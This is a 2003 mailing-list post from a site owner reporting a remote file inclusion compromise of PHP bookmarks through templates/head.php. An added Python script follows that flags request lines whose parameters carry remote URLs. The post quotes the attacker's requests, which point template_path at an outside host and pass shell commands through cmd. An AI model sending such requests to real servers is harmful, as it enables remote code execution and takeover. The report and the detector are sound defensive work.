From: Stefan M. <sm...@4f...> - 2003-03-09 19:44:43
Hi all,

I'm not subscribed to this list, so reply with Cc to me.

Last night my site was hacked using PHP bookmarks. I like this program very much, but this time I hated it. The "bug" is in /bookmarks/templates/head.php, you can set the include path through normal http requests. The following requests were made:

GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.madsk8er.hpg.com.br/&cmd=id HTTP/1.1
GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.madsk8er.hpg.com.br/&cmd=uname%20-a HTTP/1.1

and some more.

For now I limited access to the template path. I'm not sure if I should use Safe Mode for PHP. Is this the better way?

cu,
Stefan.
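
The requests quoted in the message above share one log signature: a query parameter whose decoded value is an absolute remote URL, sent to a template script. The following is an added example, not part of the original post or of the PHP bookmarks code, that flags such request lines; the function names, the key-name heuristic, and the third sample line are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request lines: the first two are quoted from the post; the third is a
# constructed benign request added for contrast.
SAMPLE_REQUESTS = [
    "GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.madsk8er.hpg.com.br/&cmd=id HTTP/1.1",
    "GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.madsk8er.hpg.com.br/&cmd=uname%20-a HTTP/1.1",
    "GET /bookmarks/index.php?action=view&id=12 HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
# A parameter value that starts with a remote scheme is the indicator.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# Heuristic (assumption): key names that usually feed include()/require().
PATH_LIKE_KEY = re.compile(r"path|dir|file|include|template", re.IGNORECASE)


def inspect_request(line):
    """Return a finding dict if any query parameter carries a remote URL, else None."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes keys and values, so %5B/%5D become [ and ].
    params = parse_qsl(parts.query, keep_blank_values=True)
    hits = [(k, v) for k, v in params if REMOTE_SCHEME.match(v)]
    if not hits:
        return None
    return {
        "path": parts.path,
        "remote_params": hits,
        "path_like_key": any(PATH_LIKE_KEY.search(k) for k, _ in hits),
        # Parameters riding along with the remote URL, kept for triage.
        "other_params": [p for p in params if p not in hits],
    }


def scan(lines):
    """Inspect every request line and return only the findings."""
    return [f for f in map(inspect_request, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The input here is the bare request line; when reading a combined-format access log, extract the quoted request field first.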